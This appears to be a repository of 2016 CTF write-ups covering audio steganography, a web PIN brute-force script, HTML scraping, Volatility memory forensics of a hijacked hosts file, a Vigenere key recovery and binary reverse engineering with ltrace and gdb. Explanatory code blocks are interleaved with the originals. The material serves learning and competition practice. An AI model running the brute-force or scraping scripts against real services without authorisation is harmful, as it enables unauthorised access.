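    for i, col in enumerate(cols):
        median = sorted(col)[len(col) // 2]
        if col[b] > ratio * max(median, 1e-9):
            hits.append(i)
    return hits


if __name__ == "__main__":
    rate, samples = read_wav(make_wav())
    cols = spectrogram(samples)
    print("frames with a 3 kHz component:", frames_with_tone(cols, rate, 3000.0))
```

On the real file you would read it with `read_wav`, use a much smaller `ratio` or simply render `cols` as an image, and look for the bins that light up only at the end of the recording.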
16 |
17 | The only problem is that this flag is not accepted! Maybe the challenge author wanted to add a bit of guessing, or it was simply a typo. Adding the missing *e* closes the question :)
18 |
19 | flag: SHC{AudioInterceptMensagem}
20 |
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/audio.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/audio.wav
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/audio1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/audio1.png
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/flag.png
--------------------------------------------------------------------------------
/2016/americanidiot/rev20/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev20/info
--------------------------------------------------------------------------------
/2016/americanidiot/rev20/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev20/solve
--------------------------------------------------------------------------------
/2016/americanidiot/rev30/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev30/info
--------------------------------------------------------------------------------
/2016/americanidiot/rev30/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev30/solve
--------------------------------------------------------------------------------
/2016/americanidiot/steg40/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/steg40/README.md
--------------------------------------------------------------------------------
/2016/americanidiot/steg40/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/steg40/info
--------------------------------------------------------------------------------
/2016/americanidiot/web30/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web30/info
--------------------------------------------------------------------------------
/2016/americanidiot/web30/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web30/solve
--------------------------------------------------------------------------------
/2016/americanidiot/web50/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web50/info
--------------------------------------------------------------------------------
/2016/americanidiot/web50/solve.py:
--------------------------------------------------------------------------------
1 | from urllib.request import urlopen
2 | import re
3 |
4 | # The HTML tag that wrapped the capture group was lost when this file was extracted;
5 | # restore it to the element that holds the server's answer before running.
6 | PATTERN = r"(.*?)"
7 |
8 | def progress(count, total):
9 |     return (count / total) * 100
10 |
11 | for x in range(0, 999):
12 |     # the PIN is tried as the lowercase hex form of x
13 |     url = "https://ctf.sucurihc.org/flag/eua/web50/?pin=" + str(hex(x)[2:])
14 |
15 |     print("[DEBUG] >>> Opening URL {}".format(url))
16 |     print("{0:.2f}%".format(progress(x, 999)))
17 |     conteudo = urlopen(url).read().decode('utf-8')
18 |     #print(conteudo)
19 |
20 |     matches = re.findall(PATTERN, conteudo)
21 |     if not matches:          # indexing [0] on an empty list would abort the whole run
22 |         continue
23 |     result = matches[0]
24 |     print(result)
25 |
26 |     if 'SHC{' in result:
27 |         break
28 |
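The script above is a linear PIN brute force with a stop-on-first-hit condition. As an added example (not the original solve script), the same idea is written as a reusable function with a pluggable `fetch` callable, so transport errors skip a candidate instead of aborting the run and the logic can be exercised offline. The fake endpoint below is constructed for the example; the secret PIN and flag in it are placeholders, and in practice `fetch` would wrap urllib or requests.

```python
import re

FLAG_RE = re.compile(r"SHC\{[^}]*\}")


def hex_pins(limit):
    """Candidate PINs as lowercase hex strings for 0 .. limit-1 (the encoding the script used)."""
    return (format(i, "x") for i in range(limit))


def brute_force(fetch, candidates, pattern=FLAG_RE):
    """Try each candidate in order. Returns (pin, flag, attempts) on the first hit, or None
    once the candidates are exhausted. A fetch returning None counts as a failed attempt."""
    attempts = 0
    for pin in candidates:
        attempts += 1
        body = fetch(pin)
        if body is None:                 # transport error: move on rather than crash mid-run
            continue
        m = pattern.search(body)
        if m:
            return pin, m.group(0), attempts
    return None


# --- constructed stand-in for the challenge endpoint (not the real server) ---
SECRET_PIN = "2af"


def fake_fetch(pin):
    if pin == "10":
        return None                      # simulate one dropped connection
    if pin == SECRET_PIN:
        return "<html><body><p>SHC{placeholder_flag}</p></body></html>"
    return "<html><body><p>Wrong PIN</p></body></html>"


if __name__ == "__main__":
    print(brute_force(fake_fetch, hex_pins(0x1000)))
```

Against a live target, a real `fetch` would also need a timeout and a small retry budget; the search loop itself does not change.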
--------------------------------------------------------------------------------
/2016/oldreligion/cripto10/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto10/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto20/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto20/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto20/tabuleiro_final.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto20/tabuleiro_final.png
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/alfabeto.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/alfabeto.gif
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/malachim.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/malachim.png
--------------------------------------------------------------------------------
/2016/oldreligion/for30/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/for30/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/for30/solver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/for30/solver.png
--------------------------------------------------------------------------------
/2016/oldreligion/web10/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web10/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/web10/bizarro.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web10/bizarro.jpg
--------------------------------------------------------------------------------
/2016/oldreligion/web20/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web20/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/web20/imagem.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web20/imagem.jpg
--------------------------------------------------------------------------------
/2016/oldreligion/web20/solve.py:
--------------------------------------------------------------------------------
1 | from urllib.request import urlopen
2 | import re
3 |
4 | url = "https://ctf.sucurihc.org/flag/oldreligion/web20/index.html"
5 |
6 | print("[DEBUG] >> Opening url {}".format(url))
7 | conteudo = urlopen(url).read().decode("ISO-8859-1")
8 |
9 | print("[DEBUG] <<< Viewing content {}".format(conteudo))
10 | resultado = re.findall("alt=\"(.*?)(\"/|\" /)>", conteudo)
11 |
12 | flag = ""
13 | for letras in resultado:
14 | #print(str(letras[0]))
15 | flag += letras[0]
16 |
17 | print("Flag: {}".format(flag))
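The regex in solve.py only matches `alt="..."` followed by `/>` or ` />`, so an `alt` with single quotes, uppercase attribute names or a non-self-closing `<img>` would silently drop a character of the flag. As an added example (not the original script), the block below collects `alt` values in document order with `html.parser`, and runs the original regex on the same input to show the difference. The HTML is a constructed sample; the real page is the URL in solve.py.

```python
import re
from html.parser import HTMLParser

ORIGINAL_RE = re.compile(r'alt=\"(.*?)(\"/|\" />)')   # pattern used by solve.py


class AltCollector(HTMLParser):
    """Append the alt text of every <img> in the order it appears in the document."""

    def __init__(self):
        super().__init__()
        self.alts = []

    def handle_starttag(self, tag, attrs):          # also reached for <img ... /> via handle_startendtag
        if tag == "img":
            alt = dict(attrs).get("alt")
            if alt is not None:
                self.alts.append(alt)


def flag_from_alts(html):
    p = AltCollector()
    p.feed(html)
    p.close()
    return "".join(p.alts)


def flag_by_regex(html):
    return "".join(m[0] for m in ORIGINAL_RE.findall(html))


# constructed sample: mixed quoting, attribute order, case and self-closing styles
SAMPLE = """<html><body>
<img src="a.jpg" alt="S"/>
<img alt='H' src="b.jpg" />
<IMG SRC="c.jpg" ALT="C">
<img src="d.jpg" alt="{">
<img src="x.jpg">
<img src="e.jpg" alt="placeholder}"/>
</body></html>"""

if __name__ == "__main__":
    print("parser:", flag_from_alts(SAMPLE))
    print("regex: ", flag_by_regex(SAMPLE))
```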
--------------------------------------------------------------------------------
/2016/seccon/Memory Analysis/README.md:
--------------------------------------------------------------------------------
1 | # Memory Analysis
2 | 100 points
3 | Memory Analysis
4 | Find the website that the fake svchost is accessing.
5 | You can get the flag if you access the website!!
6 |
7 | memoryanalysis.zip
8 |
9 | The challenge files are huge, please download it first.
10 | Hint1: http://www.volatilityfoundation.org/
11 | Hint2: Check the hosts file
12 | password: fjliejflsjiejlsiejee33cnc
13 |
14 | ## Resolution
15 |
16 | After unzipping memoryanalysis.zip we get forensic_100.raw; as the hint suggests, we use Volatility to analyze it.
17 |
18 | First, identify the OS profile:
19 | ```bash
20 | vol.py -f forensic_100.raw imageinfo
21 | Volatility Foundation Volatility Framework 2.5
22 | INFO : volatility.debug : Determining profile based on KDBG search...
23 | Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
24 | AS Layer1 : IA32PagedMemoryPae (Kernel AS)
25 | AS Layer2 : FileAddressSpace (/Users/cyborg/Downloads/forensic_100.raw)
26 | PAE type : PAE
27 | DTB : 0x34c000L
28 | KDBG : 0x80545ce0L
29 | Number of Processors : 1
30 | Image Type (Service Pack) : 3
31 | KPCR for CPU 0 : 0xffdff000L
32 | KUSER_SHARED_DATA : 0xffdf0000L
33 | Image date and time : 2016-12-06 05:28:47 UTC+0000
34 | Image local date and time : 2016-12-06 14:28:47 +0900
35 | ```
36 |
37 | Now check whether the hosts file is present in memory. The same filescan output also shows a svchost.exe sitting directly in \WINDOWS rather than \WINDOWS\system32, a classic sign of a fake svchost:
38 | ```bash
39 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 filescan | grep -i host
40 | Volatility Foundation Volatility Framework 2.5
41 | 0x000000000201ef90 1 0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
42 | 0x00000000020f0268 1 0 R--r-d \Device\HarddiskVolume1\WINDOWS\svchost.exe
43 | 0x000000000217b748 1 0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts
44 | 0x00000000024a7a90 1 0 R--rwd \Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
45 | ```
46 |
47 | The file is there. Create a directory to store the dump:
48 | ```bash
49 | mkdir output
50 | ```
51 |
52 | Then extract the file by its physical offset:
53 | ```bash
54 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 dumpfiles -D output -Q 0x000000000217b748
55 | Volatility Foundation Volatility Framework 2.5
56 | DataSectionObject 0x0217b748 None \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts
57 | ```
58 |
59 | Read the extracted hosts file:
60 | ```bash
61 | cat output/file.None.0x819a3008.dat
62 | # Copyright (c) 1993-1999 Microsoft Corp.
63 | #
64 | # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
65 | #
66 | # This file contains the mappings of IP addresses to host names. Each
67 | # entry should be kept on an individual line. The IP address should
68 | # be placed in the first column followed by the corresponding host name.
69 | # The IP address and the host name should be separated by at least one
70 | # space.
71 | #
72 | # Additionally, comments (such as these) may be inserted on individual
73 | # lines or following the machine name denoted by a '#' symbol.
74 | #
75 | # For example:
76 | #
77 | # 102.54.94.97 rhino.acme.com # source server
78 | # 38.25.63.10 x.acme.com # x client host
79 |
80 | 127.0.0.1 localhost
81 | 153.127.200.178 crattack.tistory.com
82 | ```
83 |
84 | The hosts file pins crattack.tistory.com to 153.127.200.178. That is not the site's real address, as a DNS lookup confirms, so anything on the box that resolves that name is silently redirected to a different server:
85 | ```bash
86 | nslookup crattack.tistory.com
87 | Server: 8.8.8.8
88 | Address: 8.8.8.8#53
89 |
90 | Non-authoritative answer:
91 | Name: crattack.tistory.com
92 | Address: 175.126.170.110
93 | Name: crattack.tistory.com
94 | Address: 175.126.170.70
95 | ```
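The hosts file is the first place to look for this kind of redirection, and the check generalizes: any entry that binds a public hostname to an address DNS does not return is worth a closer look. As an added example (not part of the original writeup), the block below parses a Windows-style hosts file, skips loopback and local names, and flags entries whose pinned IP is absent from the resolver's answers. The hosts text is the one recovered above; the DNS answers are a constructed table standing in for `socket.getaddrinfo` so the example runs offline.

```python
import ipaddress
import socket

# the hosts file recovered from the memory image (comments abbreviated)
HOSTS_TEXT = """\
# Copyright (c) 1993-1999 Microsoft Corp.
# 102.54.94.97     rhino.acme.com          # source server
127.0.0.1       localhost
153.127.200.178 crattack.tistory.com
"""

# constructed resolver answers (offline stand-in for socket.getaddrinfo)
DNS_TABLE = {
    "crattack.tistory.com": {"175.126.170.110", "175.126.170.70"},
}


def parse_hosts(text):
    """Return (ip, hostname) pairs, dropping comments, blank and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                      # not an address in the first column; a real tool would log it
        for name in parts[1:]:
            entries.append((str(ip), name.lower()))
    return entries


def resolve(name, table=None):
    """Set of addresses for name, from the constructed table or, if none is given, from live DNS."""
    if table is not None:
        return set(table.get(name, ()))
    return {info[4][0] for info in socket.getaddrinfo(name, None)}


def find_hijacks(text, table=None):
    """Entries for non-local names whose pinned IP is not among the resolver's answers."""
    hijacks = []
    for ip, name in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        if name in ("localhost", "broadcasthost") or name.endswith(".local") or addr.is_loopback:
            continue
        answers = resolve(name, table)
        if ip not in answers:
            hijacks.append({"name": name, "hosts_ip": ip, "dns_ips": sorted(answers)})
    return hijacks


if __name__ == "__main__":
    for h in find_hijacks(HOSTS_TEXT, DNS_TABLE):
        print("suspicious hosts entry:", h)
```

A mismatch is not proof by itself (CDNs rotate addresses, and some admins pin hosts deliberately), which is why the writeup goes on to correlate it with the browser history before requesting the path from the pinned address.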
96 |
97 | Next, pull the browsing history with the iehistory plugin:
98 | ```bash
99 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 iehistory | grep -i "crattack.tistory.com"
100 | Volatility Foundation Volatility Framework 2.5
101 | Location: http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
102 | Location: Visited: SYSTEM@http://crattack.tistory.com/rss
103 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
104 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
105 | Location: http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
106 | Location: Visited: SYSTEM@http://crattack.tistory.com/rss
107 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
108 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
109 | Location: :2016120620161207: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
110 | Location: :2016120620161207: SYSTEM@:Host: crattack.tistory.com
111 | Location: :2016120620161207: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
112 | ```
113 |
114 | As we can see, the SYSTEM account visited http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd several times, so let's check it out
115 | ```bash
116 | curl -v 153.127.200.178/entry/Data-Science-import-pandas-as-pd
117 | * Trying 153.127.200.178...
118 | * Connected to 153.127.200.178 (153.127.200.178) port 80 (#0)
119 | > GET /entry/Data-Science-import-pandas-as-pd HTTP/1.1
120 | > Host: 153.127.200.178
121 | > User-Agent: curl/7.49.1
122 | > Accept: */*
123 | >
124 | < HTTP/1.1 200 OK
125 | < Server: nginx/1.10.0 (Ubuntu)
126 | < Date: Mon, 12 Dec 2016 11:43:10 GMT
127 | < Content-Type: application/octet-stream
128 | < Content-Length: 36
129 | < Last-Modified: Tue, 06 Dec 2016 07:11:29 GMT
130 | < Connection: keep-alive
131 | < ETag: "584664a1-24"
132 | < Accept-Ranges: bytes
133 | <
134 | SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}
135 | * Connection #0 to host 153.127.200.178 left intact
136 | ```
137 |
138 | The flag is SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}
139 |
140 | ## Links
141 | - http://www.volatilityfoundation.org/
142 |
--------------------------------------------------------------------------------
/2016/seccon/Memory Analysis/memoryanalysis.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/Memory Analysis/memoryanalysis.zip
--------------------------------------------------------------------------------
/2016/seccon/Vigenere/README.md:
--------------------------------------------------------------------------------
1 | # Vigenere - Crypto 100
2 |
3 | As the title for this chall claims, this is all about Vigenere cipher. Interestingly the alphabet used is not [A-Z], but also includes '{' and '}'. Besides giving us a full Vigenere table, the chall also provides some information about the key, the plaintext and the ciphertext.
4 |
5 | ~~~~
6 | k: ????????????
7 | p: SECCON{???????????????????????????????????}
8 | c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ
9 |
10 | k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe
11 | ~~~~
12 |
13 | From now on we are going to assume *len(k)==12*. Our main goal is clearly to find *p*. Since we have the first 7 chars of *p* (and of *c*), we can easily find the first 7 chars of *k*. We could even use the given table and do it manually. For the first char of *p*, *p[0]=='S'*, we would check the row of the table corresponding to *S*. Since *S* gets mapped to *c[0]=='L'*, we look for *L* in this row, which is in the column of *V*. The figure below illustrates this process:
14 |
15 | 
16 |
17 | ~~~~
18 | pt = "SECCON{"
19 | ct = "LMIG}RP"
20 |
21 | res = ""
22 | for p,c in zip(pt, ct):
23 |     res += chr( ord('A') + ( (ord(c) - ord(p)) % 28) )  # maps back into A-Z only, so '{' and '}' come out wrong
24 |
25 | print(res)
26 | ~~~~
27 |
28 | This simple procedure results in *VIGESEN* as the first part of the key. Evidently the chars '{' and '}' are not being correctly treated in positions 5 and 7. Either by correcting them manually or by guessing, we might deduce that *VIGENER* is indeed the first part. It is not hard to find that *VIGENERE* are the first 8 chars of the key.
29 |
30 | We have the following result so far:
31 |
32 | ~~~~
33 | P: SECCON{A_ _ _ _BCDEDEFG_ _ _ _KLMNOPQR_ _ _ _VWXYYZ}
34 | K: VIGENERE_ _ _ _VIGENERE_ _ _ _VIGENERE_ _ _ _VIGENER
35 | C: LMIG}RPED O E EWKJIQIWKJ W M NDTSR}TFVU F W YOCBAJBQ
36 | ~~~~
37 |
38 | It seems the alphabet is part of *p*. After *G* there might be *HIJ_* or maybe *_HIJ*. The same goes for *STU_* or *_STU* right after *R*. Before going for a bruteforce solution we decided to test a few possibilities manually. We tried *H* in position 23 and *S* in position 32. Surprisingly, we got *C* as the result for the key in both cases. Certainly a good sign. Trying the other chars we got *VIGENERECOD_* for the key. Not hard to guess the answer should be *VIGENERECODE*, proving our first guess was correct!
39 |
40 | With the key in hand, all we had to do was decode the ciphertext in order to obtain **SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}**.
41 |
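The same known-plaintext recovery done properly over the challenge's 28-symbol alphabet, as an added example (not the writeup's snippet): indexing into the alphabet string instead of into `ord()` is what makes `{` and `}` come out right, so the first seven characters of the key are recovered as *VIGENER* directly. `recover_key` also accepts a plaintext fragment at any offset, which is how the `}` at the end and the guessed letters in the middle fill in further key positions.

```python
"""Vigenere over the 28-symbol alphabet A-Z{} (added example, not the writeup's code)."""
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"   # the challenge's table: 26 letters plus both braces
M = len(ALPHABET)                            # 28
IDX = {ch: i for i, ch in enumerate(ALPHABET)}


def encrypt(plain, key):
    return "".join(ALPHABET[(IDX[p] + IDX[key[i % len(key)]]) % M] for i, p in enumerate(plain))


def decrypt(cipher, key):
    return "".join(ALPHABET[(IDX[c] - IDX[key[i % len(key)]]) % M] for i, c in enumerate(cipher))


def recover_key(cipher, known_plain, key_len, offset=0):
    """Known-plaintext attack: fill the key positions revealed by a plaintext fragment that
    sits at `offset` in the message. Unknown positions stay '?'; a fragment that would need
    two different values for one key position is rejected (wrong guess or wrong key length)."""
    key = ["?"] * key_len
    for i, (p, c) in enumerate(zip(known_plain, cipher[offset:offset + len(known_plain)])):
        k = ALPHABET[(IDX[c] - IDX[p]) % M]
        pos = (offset + i) % key_len
        if key[pos] not in ("?", k):
            raise ValueError(f"inconsistent key symbol at position {pos}: {key[pos]} vs {k}")
        key[pos] = k
    return "".join(key)


CIPHER = "LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ"   # ciphertext from the challenge

if __name__ == "__main__":
    print(recover_key(CIPHER, "SECCON{", 12))            # VIGENER?????
    print(recover_key(CIPHER, "VWXYYZ}", 12, offset=36))  # the tail fixes the same 7 positions
    print(decrypt(CIPHER, "VIGENERECODE"))
```

Because the message is 43 symbols and the key 12, the trailing `VWXYYZ}` lands on key positions 0 to 6 again, so the two fragments confirm each other; a contradiction there would have been the first sign that *len(k)==12* was the wrong assumption.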
42 | Although we used a lot of guessing to make things quicker, our next approach would have been brute-forcing the given md5 hash. In fact, we decided to confirm our guesses with a little coding:
43 |
44 | ~~~~
45 | import itertools
46 | import hashlib
47 | import binascii
48 |
49 | hashChall = "f528a6ab914c1ecf856a1d93103948fe"
50 | res = ""
51 |
52 | # the range could include the whole alphabet for more extensive search
53 | for a in itertools.product("AB",repeat=4):
54 |     for b in itertools.product("HIJJ",repeat=4):
55 |         for c in itertools.product("STTU",repeat=4):
56 |             pt = "SECCON{A"+"".join(a)+"BCDEDEFG"+"".join(b)+"KLMNOPQR"+"".join(c)+"VWXYYZ}"
57 |             hashTst = hashlib.md5(pt.encode('utf-8')).hexdigest()
58 |             if hashTst == hashChall:
59 |                 res = pt
60 | print(res)
61 | ~~~~
62 |
--------------------------------------------------------------------------------
/2016/seccon/Vigenere/vigenere.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/Vigenere/vigenere.png
--------------------------------------------------------------------------------
/2016/seccon/voip/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/1.jpg
--------------------------------------------------------------------------------
/2016/seccon/voip/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/2.jpg
--------------------------------------------------------------------------------
/2016/seccon/voip/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/README.MD
--------------------------------------------------------------------------------
/2016/seccon/voip/voip.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/voip.pcap
--------------------------------------------------------------------------------
/2016/sharifctf/rev-50/README.md:
--------------------------------------------------------------------------------
1 | # Getit
2 |
3 | ## Description
4 | Open and read the flag file!
5 |
6 | ## Solution
7 |
8 | After downloading the getit file we need to take a look at what kind of file we are working with.
9 | ```bash
10 | file getit
11 | getit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=e389cd7a4b9272ba80f85d7eb604176f6106c61e, not stripped
12 | ```
13 |
14 | Let's run the file
15 | ```
16 | ./getit
17 | ```
18 |
19 | We got no output, so let's check the file with the strings command
20 | ```bash
21 | strings getit
22 | /lib64/ld-linux-x86-64.so.2
23 | libc.so.6
24 | fopen
25 | __stack_chk_fail
26 | strlen
27 | fseek
28 | fputc
29 | fclose
30 | remove
31 | fprintf
32 | __libc_start_main
33 | __gmon_start__
34 | GLIBC_2.4
35 | GLIBC_2.2.5
36 | fffff.
37 | /tmp/flaH
38 | g.txf
39 | []A\A]A^A_
40 | ;*3$"
41 | c61b68366edeb7bdce3c6820314b7498
42 | SharifCTF{????????????????????????????????}
43 | *******************************************
44 | [...]
45 | ```
46 |
47 | So we have some kind of hex string right above the SharifCTF line, but it is not the flag; another interesting thing in the output is the /tmp/flaHg.txf fragment, so let's check the library calls
48 | ```bash
49 | ltrace ./getit
50 | __libc_start_main(0x400756, 1, 0x7ffdc20a5348, 0x4008f0
51 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
52 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
53 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
54 | [...]
55 | fopen("/tmp/flag.txt", "w") = 0x144b010
56 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
57 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
58 | fseek(0x144b010, 30, 0, 30) = 0
59 | fputc('5', 0x144b010) = 53
60 | fseek(0x144b010, 0, 0, 0) = 0
61 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
62 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
63 | fseek(0x144b010, 24, 0, 24) = 0
64 | fputc('a', 0x144b010) = 97
65 | fseek(0x144b010, 0, 0, 0) = 0
66 | [...]
67 | fputc('{', 0x144b010) = 123
68 | fseek(0x144b010, 0, 0, 0) = 0
69 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
70 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
71 | fclose(0x144b010) = 0
72 | remove("/tmp/flag.txt") = 0
73 | +++ exited (status 0) +++
74 | ```
75 |
76 | As we can see above, fopen opens a /tmp/flag.txt file, but at the end of the output remove gets rid of it. So let's open the binary in gdb
77 | ```
78 | gdb -q
79 | (gdb) file getit
80 | Reading symbols from getit...(no debugging symbols found)...done.
81 | (gdb) set disassembly-flavor intel
82 | (gdb) disassemble main
83 | Dump of assembler code for function main:
84 | 0x0000000000400756 <+0>: push rbp
85 | 0x0000000000400757 <+1>: mov rbp,rsp
86 | 0x000000000040075a <+4>: push rbx
87 | 0x000000000040075b <+5>: sub rsp,0x38
88 | 0x000000000040075f <+9>: mov rax,QWORD PTR fs:0x28
89 | 0x0000000000400768 <+18>: mov QWORD PTR [rbp-0x18],rax
90 | 0x000000000040076c <+22>: xor eax,eax
91 | 0x000000000040076e <+24>: mov DWORD PTR [rbp-0x40],0x0
92 | 0x0000000000400775 <+31>: mov eax,DWORD PTR [rbp-0x40]
93 | 0x0000000000400778 <+34>: movsxd rbx,eax
94 | 0x000000000040077b <+37>: mov edi,0x6010a0
95 | 0x0000000000400780 <+42>: call 0x4005e0
96 | 0x0000000000400785 <+47>: cmp rbx,rax
97 | 0x0000000000400788 <+50>: jae 0x4007c7
98 | 0x000000000040078a <+52>: mov eax,DWORD PTR [rbp-0x40]
99 | 0x000000000040078d <+55>: lea edx,[rax+0xa]
100 | 0x0000000000400790 <+58>: mov eax,DWORD PTR [rbp-0x40]
101 | 0x0000000000400793 <+61>: cdqe
102 | 0x0000000000400795 <+63>: movzx eax,BYTE PTR [rax+0x6010a0]
103 | 0x000000000040079c <+70>: mov ecx,eax
104 | 0x000000000040079e <+72>: mov eax,DWORD PTR [rbp-0x40]
105 | 0x00000000004007a1 <+75>: and eax,0x1
